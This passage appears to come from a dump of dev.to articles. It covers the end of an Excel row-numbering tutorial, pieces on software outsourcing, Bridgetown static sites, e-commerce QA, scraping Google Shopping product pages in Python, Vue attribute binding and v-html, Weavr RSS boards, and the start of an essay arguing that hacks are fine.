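print(row_numbers_skip_blanks(["Apple", "", "Mango", "Grapes", "", "Kiwi"]))
# → [1, '', 2, 3, '', 4]
```

Each non-blank cell receives the count of non-blank cells seen so far, which is exactly what `COUNTA($A$1:A1)` produces when the formula is dragged down the column.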
## Verdict:
So yeah guys, this is **how you can add row numbers and skip the cells that are blank in Excel**. Leave a **comment** or **reply** below to let me know what you think!
Thank you so much for visiting **[Geek Excel](https://geekexcel.com/)**!! If you want to learn more helpful formulas, check out [**Excel Formulas**](https://geekexcel.com/excel-formula/)!!
### Read Ahead:
- **[Excel Formulas to Get the Profit Margin Percentage ~ Quickly!!](https://geekexcel.com/excel-formulas-to-get-the-profit-margin-percentage/)**
- **[How to Insert a Date or Formatted Date in Excel Office 365?](https://geekexcel.com/how-to-insert-a-date-or-formatted-date-in-excel-office-365/)**
- **[Excel Formulas to Calculate the Surface Area of a Cone ~ Easy Tricks!!](https://geekexcel.com/excel-formulas-to-calculate-the-surface-area-of-a-cone/)**
- **[Excel Formulas to Get the Percentage Discount ~ Useful Tricks!!](https://geekexcel.com/excel-formulas-to-get-the-percentage-discount/)**
| excelgeek |
752,445 | The Difference Between Offshore Software Outsourcing and Onshore Outsourcing | Nowadays, many leading businesses and companies opt for software outsourcing services to increase... | 0 | 2021-07-07T12:11:35 | https://testfort.com/blog/the-difference-between-onshore-and-offshore-software-outsourcing | testing, apptesting, qatesting, qaoutsourcing | Nowadays, many leading businesses and companies opt for software outsourcing services to increase productivity, reduce costs on hiring an in-house team of remote developers, and get effective results. Generally, you can choose between onshore and offshore software outsourcing depending on your project objectives and personal preferences. You might be wondering what is the difference between onshore and offshore [software development outsourcing companies] (https://qarea.com/). Below, you will find a detailed explanation and benefits of using each type.
# What Is Onshore Software Outsourcing?
When we talk about onshore software outsourcing services, we mean hiring a team of software developers located in your own country. The main advantage of hiring an onshore team of developers is the geographical proximity to your business. The closer your team is to you, the easier it is to monitor their progress and all project-related activities. The contractor can even visit the team of developers in person from time to time to make the collaboration as effective and productive as possible.
# High Pricing That Comes with a Shared Culture and Legal Framework
One of the main benefits of onshore outsourcing is the absence of cultural differences and a language barrier, as you live and work in the same country, so you won’t have problems communicating and understanding each other. The time zone is also the same, so you don’t have to wait long for an answer due to a time difference. It will be much easier to discuss project details and address any issues that arise.
Collaborating with an onshore company means that both of you comply with your country’s regulations, which makes it easier to identify and resolve issues. However, the main downside of onshore developers is the high labor cost. Yes, you can find highly skilled and accomplished professionals close to you, but due to the talent shortage, the search will take much longer and be more difficult. The hourly rate for onshore software development services is approximately $100 and can reach $125 per hour. This price is probably not affordable for all companies and businesses. So, if you are on a budget, consider an offshore option.
# What Is Offshore Software Development?

Offshore software outsourcing means recruiting a team of developers abroad to work remotely. Companies that outsource their projects usually collaborate with teams from India, China, and Eastern European countries such as Ukraine, Poland, and the Czech Republic.
The main advantage of an offshore [development company](https://qarea.com/) is the low labor cost of approximately $20 per hour. This flat hourly rate can hardly be beaten by other options. Thus, offshoring developers is the most convenient and affordable choice for many companies and startups that cannot afford to hire an expensive onshore team.
>“Collaborating with offshore software developers, you will most likely have to compromise cultural and time zone differences, but not technical expertise or budget (if the right vendor’s chosen).”
>Expert, TestFort
It’s easy to find offshore professionals with great software development expertise and an excellent verbal and written command of English. Generally, offshore [software development companies](https://qarea.com/) offer high-quality service and meet all the customer’s requirements.
Among the main drawbacks of collaborating with teams abroad is the time zone difference, which complicates communication between developers and contractors. It is always possible to keep in touch via phone, Skype, chat, or email, but delays cannot be avoided. This makes it harder to address issues, discuss all the details, and monitor the process and quality of work.
While an offshore team may speak English well, misunderstandings can still arise due to cultural differences, so in some cases it might be harder to convey requirements and instructions. In addition, if an issue with foreign workers occurs, it will be challenging to resolve, as you will have to deal with another country’s regulations and courts.
# QA & Software Testing Outsourcing
Traditionally, people are used to discussing software outsourcing in the context of development. However, as IT outsourcing was becoming more popular and widely used across industry-leading companies like Amazon, Apple, Skype, etc., services offered on the market expanded greatly. These days, you can find a relevant professional or a team to cover basically any stage of a software development project, from technical consulting to [product design](https://qarea.com/services/ui-ux-design), business analysis, and, of course, software testing.
Quality assurance takes a special place in the range of offshore software outsourcing services, primarily because of its great benefits for the end product. Having a third-party QA team test your application is a sure way to find out all the weaknesses of your product. In the case of testing, the fact that an offshore team doesn’t work for you directly and was not involved in the product development since day one makes the QA process as unbiased as it could possibly be.
# QA Outsourcing Service List
If you ever think of hiring a remote quality assurance company, we would recommend looking for one that specializes in software testing specifically. The range of services such companies offer does not end with just “testing”. Depending on the type of software under examination, the tech stack it is built on, and your long-term plans for this particular product, you will need at least one of the following procedures:
- [Functionality testing](https://testfort.com/functional-testing);
- UI/UX testing;
- Compatibility check;
- [Manual QA](https://testfort.com/manual-testing);
- [Automated QA](https://testfort.com/automated-testing);
- Security testing;
- Localization check.
All of these can be implemented equally well by nearshore and offshore teams. However, when deciding between these two options, keep in mind that distance can at times be even more beneficial for clear testing results than close control. The users of your software product most likely won’t be limited to a certain location, which means you don’t have to put your QA team anywhere near yourself to find out if your product is good enough to release.
# Choosing Between Onshore and Offshore Development Outsourcing
Before you [hire a team of developers](https://qarea.com/hire-developers), clearly define your priorities. Then you can choose whether to go for an offshore or onshore team of developers. Each option has its own benefits, so weigh the pros and cons of onshore and offshore development outsourcing carefully. Hire developers that best suit your needs and create a top-notch product together.
| testfort_inc |
752,485 | Build a blog with Bridgetown | Table of Contents Setup Ruby component and plugin Deployment and... | 0 | 2021-07-07T13:43:04 | https://fpsvogel.com/posts/2021/build-a-blog-with-bridgetown | webdev, jamstack, ruby, tutorial | ---
title: Build a blog with Bridgetown
subtitle: templates, components, and plugins all in Ruby
---
{% collapsible **Table of Contents** %}
1. [Setup](#1-setup)
2. [Ruby component and plugin](#2-ruby-component-and-plugin)
3. [Deployment and beyond](#3-deployment-and-beyond)
4. [Conclusion](#conclusion)
{% endcollapsible %}
**UPDATE, January 2022:** *Bridgetown 1.0 beta has been released! 🎉 I've updated the setup instructions below.*
Once upon a time, in ye olden days of 2008, the world saw the release of Jekyll, the first popular static site generator. Fast forward a dozen-plus years, and its popularity has been eclipsed by newer JavaScript counterparts like Gatsby and Eleventy. And why not? Jekyll runs on Ruby *(boo!)* so it is unsexy and [obviously super slow](https://css-tricks.com/comparing-static-site-generator-build-times/#jekyll-the-odd-child). (Hint: in that article, read down to where the author notes, "Also surprising is that Jekyll performed faster than Eleventy for every run.")
Sarcasm aside, Jekyll seems to be built on a solid enough foundation, but unfortunately it has not received a lot of updates in recent years. Is this another arena where, as they say, Ruby is dead?
Enter [Bridgetown](https://edge.bridgetownrb.com/), a fork of Jekyll which aims to compete toe-to-toe with its modern JS cousins, providing even more Ruby tools for building static sites. Very exciting.
Many of Bridgetown's Ruby upgrades are already released, so I (happy for any chance to write Ruby) rebuilt and extended this blog with Bridgetown. Here's how I did it. Note that these instructions apply to [Bridgetown 1.0](https://edge.bridgetownrb.com/release/beta-1-is-feature-complete/), the latest version at the time of writing. Also note that a knowledge of Ruby is assumed here, but not necessarily any prior experience in building a static site.
You can see the final result of this process in [my site's GitHub repo](https://github.com/fpsvogel/blog-2021). The site itself is at [fpsvogel.com](https://fpsvogel.com/).
## 1. Setup
1. Follow the steps on Bridgetown's [Getting Started](https://edge.bridgetownrb.com/docs) page.
- To create the site, I ran `bridgetown new blog -t erb`. The added option is to use ERB templates, rather than the default of Liquid.
- See also [all the command line options](https://edge.bridgetownrb.com/docs/command-line-usage).
- If you already know of some bundled configurations that you need (see below), you can include them in the `new` command. In my case: `bridgetown new blog -t erb -c turbo,stimulus,bt-postcss`
2. Add [bundled configurations](https://edge.bridgetownrb.com/docs/bundled-configurations) that you need. In my case:
- [Turbo](https://edge.bridgetownrb.com/docs/bundled-configurations#turbo) for faster page transitions.
- [Stimulus](https://edge.bridgetownrb.com/docs/bundled-configurations#stimulus) for adding JavaScript sprinkles (more on that below). Alternatively you could use LitElement, as explained in [the Components doc](https://edge.bridgetownrb.com/docs/components) and in [this guide to web components on Fullstack Ruby](https://www.fullstackruby.dev/fullstack-development/2022/01/04/how-ruby-web-components-work-together/).
- [Recommended PostCSS plugins](https://edge.bridgetownrb.com/docs/bundled-configurations#bridgetown-recommended-postcss-plugins). I also installed [this extra PostCSS plugin](https://github.com/postcss/postcss-scss#2-inline-comments-for-postcss) that adds support for inline comments in CSS files.
3. Install [plugins](https://edge.bridgetownrb.com/docs/plugins) that you need. In my case:
- [SEO tags](https://github.com/bridgetownrb/bridgetown-seo-tag)
- [Sitemap generator](https://github.com/ayushn21/bridgetown-sitemap)
- [Atom feed](https://github.com/bridgetownrb/bridgetown-feed)
- [SVG inliner](https://github.com/ayushn21/bridgetown-svg-inliner)
4. Set your preferred [permalink style](https://edge.bridgetownrb.com/docs/content/permalinks).
5. Set up [pagination](https://edge.bridgetownrb.com/docs/content/pagination).
6. Set your site's info in `src/_data/site_metadata.yml`.
7. Kickstart your site's design with a CSS theme. I chose [holiday.css](https://holidaycss.js.org/), a classless stylesheet for semantic HTML. Or you could use an actual Bridgetown theme, such as [Bulmatown](https://github.com/whitefusionhq/bulmatown). (That's the only Bridgetown theme as of January 2022, but I expect more will come soon from the community.)
8. Add a Pygments CSS theme for code syntax highlighting.
- Either [download one of the handily premade CSS files](https://jwarby.github.io/jekyll-pygments-themes/languages/ruby.html), or [pick from the full list](https://pygments.org/demo/#try) then [install Pygments and make it generate a CSS file](https://stackoverflow.com/a/14989819/4158773). (I picked one of the premade stylesheets and then created a second one to override some of the colors.)
- Place the CSS file in `frontend/styles`.
- Import it into `frontend/styles/index.css`: for example, for Monokai place `@import "monokai.css";` near the top of `index.css`.
## 2. Ruby component and plugin
Next I designed and built my site, a process which was mostly unremarkable, except for one thing: I built a Ruby component and plugin for a complex, data-heavy part of a page. For simpler parts of a page I just used partials, such as `_tweet_button.erb`. But for any significant manipulation of data prior to rendering, building a Ruby component makes more sense. In my case, I wanted a "Reading" page that lists titles from my `reading.csv` file (my homegrown alternative to Goodreads), including only books that I rated at least a 4 out of 5.
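To make that data shaping concrete, here is a rough sketch of the "rated at least 4 out of 5" filter. This is an illustration only — the column names are hypothetical, and the real parsing lives in a separate Ruby gem, as explained next:

```python
import csv
import io

# Hypothetical reading.csv layout; the real file's format is handled by a
# dedicated parsing gem, so these columns are illustrative only.
reading_csv = io.StringIO(
    "title,rating\n"
    "Book A,5\n"
    "Book B,3\n"
    "Book C,4\n"
)

# Keep only books rated at least 4 out of 5, as on the "Reading" page.
favorites = [row["title"]
             for row in csv.DictReader(reading_csv)
             if int(row["rating"]) >= 4]
print(favorites)  # → ['Book A', 'Book C']
```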
Following [the doc on Ruby components](https://edge.bridgetownrb.com/docs/components/ruby), I created a `ReadingList` component in `_components/reading_list.rb`, and its template `_components/reading_list.erb`.
After writing the HTML + ERB + CSS for the reading list element, I used Stimulus to add JavaScript sprinkles to expand/collapse rows with reading notes or long blurbs, to filter rows by rating or genre, and to sort rows (though sorting is disabled on my site, since I went with the minimal "favorite or not" way of showing ratings).
Then I fleshed out `reading_list.rb` to load my reading list and provide data for the template `reading_list.erb`. The CSV-parsing code is pretty complex, so I separated it out [into a gem](https://github.com/fpsvogel/reading-csv).
Thanks to a tip (one of many) from the Bridgetown creators on [the Discord server](https://discord.gg/Cugms94QFM), I realized my Ruby component had way too much logic in it which should be separated out into a plugin. So I dove into [the docs on plugins](https://edge.bridgetownrb.com/docs/plugins) and moved nearly all of my component's code into a plugin.
So now the plugin parses my CSV file (using my parsing gem) and saves it into the site's data. Then my component's `.rb` file pulls that data into instance variables. Finally, the ERB template uses the instance variables as it displays the reading list.
If you create a plugin and want to make it more easily available to other Bridgetown site creators, you should [make it into a gem](https://edge.bridgetownrb.com/docs/plugins#creating-a-gem) and possibly create an [automation](https://edge.bridgetownrb.com/docs/automations) for it. I didn't for my reading list plugin, because the intersection of people who track their reading in a CSV file and people who will make a Bridgetown site is… very few people, I'm sure.
## 3. Deployment and beyond
Publishing my site was as simple as [choosing the GitHub repo on Netlify](https://www.netlify.com/blog/2016/09/29/a-step-by-step-guide-deploying-on-netlify/) and [configuring the custom domain](https://docs.netlify.com/domains-https/custom-domains/).
One possible improvement remains. Currently, to update the reading list I must delete it (`_data/reading.yml`) and rebuild the site locally (so that my `reading.csv` can be re-parsed) before pushing it to be built and deployed on Netlify. I could avoid these manual steps by taking advantage of the fact that my `reading.csv` is automatically synced to Dropbox: I could change my plugin to connect to Dropbox and update the list from there instead of from the copy on my local machine.
## UPDATE: It's alive!
Now in October, three months later, I've made the improvement proposed above. My Bridgetown plugin now connects to my Dropbox account, reads my `reading.csv` file from there, parses newly added items, and adds them to my site's data. I'm storing my Dropbox keys in Netlify environment variables, which are passed into Bridgetown in `ENV`. Now my reading list can be updated in a Netlify build, without me having to first build it locally and push it.
This paved the way for an even cooler improvement: I followed [this guide](https://www.stefanjudis.com/snippets/how-to-schedule-jamstack-deploys-with-netlify-and-github/) to setting up automatic Netlify redeploys via GitHub Actions, and now my site rebuilds itself every week. This means that my site's Reading page is synced weekly to my `reading.csv`, and it's completely automatic! Now I'm starting to see how static sites, in spite of their simplicity, can feel quite dynamic if they are automatically rebuilt often, using content added via APIs.
## Conclusion
Besides Bridgetown itself, I learned a number of new things in this project, such as how to use Stimulus to make a page dynamic with a bit of JavaScript.
But what I really loved was using what I *already* knew (Ruby) in a completely new way. Bridgetown is doing a wonderful job of bringing the joy of Ruby into the world of modern static site generators. | fpsvogel |
752,584 | QA and testing of e-commerce | Is it necessary to run detailed testing of e-commerce products? Let's just imagine how many issues... | 0 | 2021-07-07T14:54:55 | https://dev.to/hiretesterteam/qa-and-testing-of-e-commerce-ak9 | testing, ecommerce | Is it necessary to run detailed testing of e-commerce products? Let's just imagine how many issues can happen, for example, in a payment system, orders arrangement and management, delivery monitoring and so on.
To prevent possible bottlenecks, the following types of testing can be run:
- Functional testing
- UI/UX testing
- Usability testing
- Integration testing
- User acceptance testing.
After a detailed analysis, a QA team can provide recommendations and set up the testing process so that no important details are overlooked.
Considering testing your e-commerce solution? Get a reliable partner for QA tasks with the HireTester team: info@hire-tester.com
https://hire-tester.com/ | hiretesterteam |
752,778 | Scrape Google Shopping Product Results with Python | Contents: intro, imports, what will be scraped, process, code, links, outro. Intro This... | 12,790 | 2021-07-16T09:44:58 | https://serpapi.com/blog/scrape-google-shopping-product-results-with-python/ | python, webscraping, tutorial, datascience | Contents: intro, imports, what will be scraped, process, code, links, outro.
### Intro
This blog post is a continuation of Google's web scraping series. Here you'll see how to scrape Product Results with Python using the `beautifulsoup`, `requests`, and `lxml` libraries. An alternative API solution will be shown as well.
### Imports
```python
import requests, lxml, json
from bs4 import BeautifulSoup
from serpapi import GoogleSearch
```
### What will be scraped

### Process
1. Find a container with all the data.
2. Use nested `for` loops whenever the data isn't extracted fully in one pass. *Note that nested `for` loops can be a pain in the neck if you want a structured `json`, e.g. to `.update()` an existing `dict()`, but I could be wrong here. These words are based on my experience.*
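To illustrate the structured-`json` alternative, here's a small sketch (not from the original post — the placeholder data stands in for parsed HTML nodes) that appends nested results into one `dict` instead of printing them inside the loops:

```python
# Placeholder data standing in for the parsed page container.
page = {
    "title": "Google Pixel 4",
    "prices": ["$199.99", "$198.00"],
    "ratings": [("5 star", 361), ("4 star", 90)],
}

# Build one structured dict instead of printing inside each nested loop.
product = {"title": page["title"], "prices": [], "ratings": []}
for price in page["prices"]:
    product["prices"].append(price)
for stars, amount in page["ratings"]:
    product["ratings"].append({"stars": stars, "amount": amount})

print(product["ratings"][0])  # → {'stars': '5 star', 'amount': 361}
```

The payoff is that the result can be dumped with `json.dumps(product)` at the end, rather than reassembled from printed lines.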
### Code
```python
import requests, lxml
from bs4 import BeautifulSoup
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19582"
}
response = requests.get("https://www.google.com/shopping/product/14506091995175728218?hl=en", headers=headers)
soup = BeautifulSoup(response.text, 'lxml')
def get_product_results_data():
    for page_result in soup.select('.sg-product__dpdp-c'):
        title = soup.select_one('.sh-t__title').text
        reviews = soup.select_one('.aE5Gic span').text.replace('(', '').replace(')', '')
        rating = soup.select_one('.UzThIf')['aria-label'].replace('stars', '').replace(' out of ', '.').strip()
        description = soup.select_one('.sh-ds__trunc-txt').text
        # " · " is the dot separator between extensions
        extensions = soup.select_one('.Qo4JI').text.split(' · ')
        print(f'{title}\n{reviews}\n{rating}\n{description}\n{extensions}\n')

        for prices in page_result.select('.o4ZIje'):
            price = prices.text.replace('(', '').replace(')', '').split(' + ')[0]
            print(price)

        for review_table in page_result.select('.aALHge'):
            number_of_stars = review_table.select_one('.rOdmxf').text
            number_of_reviews = review_table.select_one('.rOdmxf').next_sibling['aria-label'].split(' ')[0]
            print(f'{number_of_stars}\n{number_of_reviews}')

        for user_review in page_result.select('.XBANlb'):
            title = user_review.select_one('.P3O8Ne').text
            rating = user_review.select_one('.UzThIf')['aria-label'].split(' ')[0]
            date = user_review.select_one('.ff3bE').text
            desc = user_review.select_one('.g1lvWe div').text
            source = user_review.select_one('.sPPcBf').text.replace(' ', ' ')
            print(f'\n{title}\n{rating}\n{date}\n{desc}\n{source}')
            print('----------------------------------------------------')

    # get the link used in another function that extracts the remaining reviews
    all_reviews_link = f"https://www.google.com{soup.select_one('a.internal-link.JKlKAe.Ba4zEd')['href']}"
    return all_reviews_link

# Output:
'''
Google Pixel 4 White 64 GB, Unlocked
632
4.5
Point and shoot for the perfect photo. Capture brilliant color and control the exposure balance of different parts of your photos. Get the shot without the flash. Night Sight is now faster and easier to use it can even take photos of the Milky Way. Get more done with your voice ...
['Google', 'Pixel Family', 'Pixel 4', 'Android', '5.7 inches screen', 'Facial Recognition', '8 MP Front Camera', 'Smartphone', 'Wireless Charging', 'Unlocked']
5 star
362
4 star
90
3 star
53
2 star
34
1 star
93
Google, PLEASE bring back the fingerprint scanner!
1
November 24, 2020
I will start by saying I am usually a huge fan of all things Google. My wife and I had the original Pixel for several years and raved about them to anyone who would listen. The batteries were finally starting to fail and it was time to get new phones. We both went for the Pixel 4 thinking we would get the same great phone we had loved for years. Even though I was disappointed right away, I waited a few months to leave a review to see if I just needed to get used to it. Now, months later, I can safely say I'm disappointed. I still cannot get over the loss of the backside fingerprint scanner. The facial recognition that took its place is useless 80% of the time (it won't work if you're wearing a face mask or in low lighting), 10% of the time it unlocks my phone unintentionally ... More
Justin Thielman · Review provided by Google
'''
```
### Get more reviews
Essentially, the URL comes from the `get_product_results_data()` function, which returns the `all_reviews_link` variable.
```python
import requests, lxml
from bs4 import BeautifulSoup
from google_get_product_results import get_product_results_data
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19582"
}
def get_all_reviews():
    response = requests.get(get_product_results_data(), headers=headers)
    soup = BeautifulSoup(response.text, 'lxml')

    for user_review in soup.select('.z6XoBf'):
        try:
            title = user_review.select_one('.P3O8Ne').text
        except AttributeError:
            title = None  # not every review has a title
        rating = user_review.select_one('.UzThIf')['aria-label'].split(' ')[0]
        date = user_review.select_one('.ff3bE').text
        desc = user_review.select_one('.g1lvWe div').text
        source = user_review.select_one('.sPPcBf').text.replace(' ', ' ')
        print(f'{title}\n{rating}\n{date}\n{desc}\n{source}')
```
### Combining two functions together:
```python
from google_get_product_results import get_product_results_data
from google_get_all_product_results_reviews import get_all_reviews
print('Product data:')
get_product_results_data()
print('All reviews:')
get_all_reviews()
# Output:
'''
Product data:
Google Pixel 4 White 64 GB, Unlocked
629
4.5
Point and shoot for the perfect photo. Capture brilliant color and control the exposure balance of different parts of your photos. Get the shot without the flash. Night Sight is now faster and easier to use it can even take photos of the Milky Way. Get more done with your voice ...
['Google', 'Pixel Family', 'Pixel 4', 'Android', '5.7 inches screen', 'Facial Recognition', '8 MP Front Camera', 'Smartphone', 'Wireless Charging', 'Unlocked']
$598.95
$598.95
5 star
361
4 star
90
3 star
53
2 star
33
1 star
92
Google, PLEASE bring back the fingerprint scanner!
1
November 24, 2020
I will start by saying I am usually a huge fan of all things Google. My wife and I had the original Pixel for several years and raved about them to anyone who would listen. The batteries were finally starting to fail and it was time to get new phones. We both went for the Pixel 4 thinking we would get the same great phone we had loved for years. Even though I was disappointed right away, I waited a few months to leave a review to see if I just needed to get used to it. Now, months later, I can safely say I'm disappointed. I still cannot get over the loss of the backside fingerprint scanner. The facial recognition that took its place is useless 80% of the time (it won't work if you're wearing a face mask or in low lighting), 10% of the time it unlocks my phone unintentionally ... More
Justin Thielman · Review provided by Google
----------------------------------------------------
All reviews:
Google, PLEASE bring back the fingerprint scanner!
1
November 24, 2020
I will start by saying I am usually a huge fan of all things Google. My wife and I had the original Pixel for several years and raved about them to anyone who would listen. The batteries were finally starting to fail and it was time to get new phones. We both went for the Pixel 4 thinking we would get the same great phone we had loved for years. Even though I was disappointed right away, I waited a few months to leave a review to see if I just needed to get used to it. Now, months later, I can safely say I'm disappointed. I still cannot get over the loss of the backside fingerprint scanner. The facial recognition that took its place is useless 80% of the time (it won't work if you're wearing a face mask or in low lighting), 10% of the time it unlocks my phone unintentionally ... More
Justin Thielman · Review provided by Google
Waste of money, google removed key features just to put them in cheaper next gen phones.
1
February 3, 2021
One of the worst phones i have ever owned. Getting rid of the fingerprint scanner was a big mistake with this phone. The face unlock is such a stupid feature, and unnecessary when people already expect and like the fingerprint scan. The battery life is abysmal. My phone doesnt last even for 1 whole day with light usage. I have an iphone 8 plus for work and that phone has a great battery life even though it is much, much much older. That iphone lasts for 3 days with regular use, and a full day if i am streaming videos all day. The photos on the pixel are okay, i dont like that it applies a ton of blurring to faces. It will blue the heck out of your face to smooth everything and i dont like that. My selfies dont even look like me. And the night photos were the main draw, but ... More
sarahlikesglitter · Review provided by Google
Please Bring Back Fingerprint Scanner
3
December 28, 2020
Like another user said, face recognition is just not as good as a fingerprint scanner. With my fingerprint, I can unlock the phone whenever I'm holding it, no matter what position. With face recognition is has to be right up to my face. It's such a pain, and now that we're wearing masks all the time, it's really a problem. If there's low lighting, it also can't see me. As someone who was a fan of the Huawei Mate before the company was banned from the US, I'm glad the Pixel finally has an Ultra/Extreme Battery Saving mode. That was one of my favorite features as someone who always has low battery because I'm always on my phone. The latest update made the phone worse in my opinion. At first, the Messenger bumbles were messing up, but they fixed that. Now, every time I try ... More
Shan Howard · Review provided by Google
I wanted an upgrade but I was taken back to 2000.
...
Other reviews..
'''
```
You can go even further by applying `Selenium` that will click on *More reviews* button until there's nothing to click on in order to extract all review results.
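A minimal, hedged sketch of that click-until-gone loop. The helper below is framework-agnostic; the Selenium wiring shown in its docstring is an assumption, and the button selector would have to be found on the live page:

```python
def click_until_gone(try_click, max_clicks=1000):
    """Repeatedly invoke try_click() until it reports the target is gone.

    try_click should return True after a successful click and False once the
    "More reviews" button can no longer be found. With Selenium, that wrapper
    might look like this (the CSS selector is hypothetical):

        def try_click():
            try:
                driver.find_element(By.CSS_SELECTOR, 'MORE_REVIEWS_BTN').click()
                return True
            except NoSuchElementException:
                return False
    """
    clicks = 0
    while clicks < max_clicks and try_click():
        clicks += 1
    return clicks
```

Once the loop finishes, `driver.page_source` can be handed to `BeautifulSoup` and parsed exactly as in the code above.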
______________________
### Using [Google Product Result API](https://serpapi.com/product-result)
SerpApi is a paid API with a free plan.
The difference I like the most is that it comes with structured `JSON` output, and all you have to do is iterate over it.
Besides that, if you want to get things done quickly, an API is the way to go, since you don't have to build everything from scratch or hunt for the right `CSS` selector.
```python
import json
from serpapi import GoogleSearch
params = {
"api_key": "YOUR_API_KEY",
"engine": "google_product",
"product_id": "14506091995175728218",
"gl": "us",
"hl": "en"
}
search = GoogleSearch(params)
results = search.get_dict()
title = results['product_results']['title']
prices = results['product_results']['prices']
reviews = results['product_results']['reviews']
rating = results['product_results']['rating']
extensions = results['product_results']['extensions']
description = results['product_results']['description']
user_reviews = results['product_results']['reviews']
reviews_results = results['reviews_results']['ratings']
print(f'{title}\n{prices}\n{reviews}\n{rating}\n{extensions}\n{description}\n{user_reviews}\n{reviews_results}')
----------------
'''
Google Pixel 4 White 64 GB, Unlocked
['$199.99', '$198.00', '$460.00']
629
3.9
['Google', 'Pixel Family', 'Pixel 4', 'Android', '5.7″', 'Facial Recognition', '8 MP front camera', 'Smartphone', 'With Wireless Charging', 'Unlocked']
Point and shoot for the perfect photo. Capture brilliant color and control the exposure balance of different parts of your photos. Get the shot without the flash. Night Sight is now faster and easier to use it can even take photos of the Milky Way. Get more done with your voice. The new Google Assistant is the easiest way to send texts, share photos, and more. A new way to control your phone. Quick Gestures let you skip songs and silence calls – just by waving your hand above the screen. End the robocalls. With Call Screen, the Google Assistant helps you proactively filter our spam before your phone ever rings.
629
[{'stars': 1, 'amount': 92}, {'stars': 2, 'amount': 33}, {'stars': 3, 'amount': 53}, {'stars': 4, 'amount': 90}, {'stars': 5, 'amount': 361}]
'''
```
You can also extract more review results using SerpApi by simply adding a `reviews` parameter to the `params` dictionary, e.g. `"reviews": "1"`. It defaults to `0` (**OFF**); set it to `1` (**ON**).

### Links
[Code in the online IDE](https://replit.com/@DimitryZub1/Scrape-Google-Shopping-Product-Result-python#main.py) • [Google Product Result API](https://serpapi.com/product-result)
### Outro
If you have any questions or something isn't working correctly or you want to write something else, feel free to drop a comment in the comment section or via Twitter at [@serp_api](https://twitter.com/serp_api).
Yours,
Dimitry, and the rest of SerpApi Team.
<img width="100%" style="width:100%" src="https://media.giphy.com/media/S2lenTmOxOAWA/giphy.gif"> | dmitryzub |
752,837 | Rendering HTML code in Vue | Let us suppose that we want to pass to the page as an attribute, a variable containing html code.... | 13,492 | 2021-07-07T20:08:30 | https://dev.to/mattiatoselli/rendering-html-code-in-vue-dan | vue, html, javascript, webdev | Let us suppose that we want to pass to the page as an attribute, a variable containing html code.
Like a clickable link. Following the previous tutorials, one could think this is the right way.
```HTML
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<!-- importing vue js dev library -->
<!-- development version, includes helpful console warnings -->
<script src="https://cdn.jsdelivr.net/npm/vue@2/dist/vue.js"></script>
<title>My vue Test</title>
</head>
<body>
<div id="app">
<a href="{{ link }}">This is the link</a>
</div>
<script type="text/javascript">
var app = new Vue({
el: '#app',
data: {
link: 'https://www.google.com' //this is the link
}
})
</script>
</body>
</html>
```
Actually this will lead to an error: Vue cannot use mustache interpolation inside attribute values, so it is unable to bind the value of the attribute. In order to accomplish the task, we have to use the bind directive.
```HTML
<a v-bind:href="link">This is the link</a>
```
Sometimes we may want to render HTML code directly, instead of just saving the link in the data key of the Vue instance and injecting it into the anchor tag. For this, Vue provides the `v-html` directive.
```HTML
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<!-- importing vue js dev library -->
<!-- development version, includes helpful console warnings -->
<script src="https://cdn.jsdelivr.net/npm/vue@2/dist/vue.js"></script>
<title>My vue Test</title>
</head>
<body>
<div id="app">
<p v-html="link"></p>
</div>
<script type="text/javascript">
var app = new Vue({
el: '#app',
data: {
link: '<a href="https://www.google.com">This is the link</a>' //this is the link
}
})
</script>
</body>
</html>
``` | mattiatoselli |
753,012 | Knowledge curation and sharing made easy through Weavr Boards and RSS Feeds | Don't want to sign up for a million email newsletters? Here's an easy way to stay up to date on content from all your favorite blogs. | 0 | 2021-07-12T06:19:45 | https://dev.to/weavr/knowledge-curation-and-sharing-made-easy-through-weavr-boards-and-rss-feeds-29m1 | rssfeed, contentcuration, weavr, newsaggregator | ---
title: Knowledge curation and sharing made easy through Weavr Boards and RSS Feeds
published: true
description: Don't want to sign up for a million email newsletters? Here's an easy way to stay up to date on content from all your favorite blogs.
tags: rssfeed, contentcuration, weavr, newsaggregator
//cover_image: https://direct_url_to_image.jpg
---
Don't want to sign up for a million email newsletters? Here's an easy way to stay up to date on content from all your favorite blogs.
Weavr Boards lets you curate and organize content from various external sources into one place.
Now you can also attach an RSS Feed to a board, that will pin any new content from that feed to your board.
You can choose to make your board Private or Public so others can also follow it.

Once your board is created, you can edit the Board settings to include one or more RSS feeds for it to track.

Things you can do with the content in your board:
1. Share selected posts in your Slack channel
2. Create an email newsletter
3. Get the markdown content for the board that you can add to Github Repository
4. You can also add one or more Call to Actions on your board

Check out and follow [Ringcentral's developer content](https://weavr.cafe/ringcentraldevs/board/ringcentral-developer-blogs) created using the above RSS feeds feature.

Sign up on [Weavr.cafe](http://weavr.cafe) today to create your own Weavr Board. | onzalis |
753,157 | Hacks Are Fine | There's a slight problem with the standard definition of a hack. It says more about why you wouldn't want to use one than why you might. What if—now hear me out—hacks are fine? | 0 | 2021-07-09T01:40:47 | https://matthogg.fyi/hacks-are-fine/ | webdev, career, motivation, watercooler | ---
title: Hacks Are Fine
published: true
date: 2021-07-08 00:00:00 UTC
tags: webdev,career,motivation,watercooler
canonical_url: https://matthogg.fyi/hacks-are-fine/
description: There's a slight problem with the standard definition of a hack. It says more about why you wouldn't want to use one than why you might. What if—now hear me out—hacks are fine?
---
_This essay has been adapted from a lightning talk that I originally presented to coworkers in 2019. It was intended as an absurd, tongue-in-cheek thought experiment, but I'd like to think there could possibly be some truth to it..._
There's a slight problem with the standard definition of a hack. It says more about why you _wouldn't_ want to use one than why you _might_. What if—now hear me out—hacks are fine?
A "hack" (also known as a "kludge") is [defined by Wikipedia](https://en.wikipedia.org/wiki/Kludge#Computer_science) as:
> A solution to a problem, the performance of a task, or a system fix which is inefficient, inelegant ("hacky"), or even incomprehensible, but which somehow works.
A definition like this will prime readers a certain way by using more negative words than positive. Also, that little bit of bewilderment at the very end really gets me—_somehow_ hacks work!?! Gosh! My goodness!
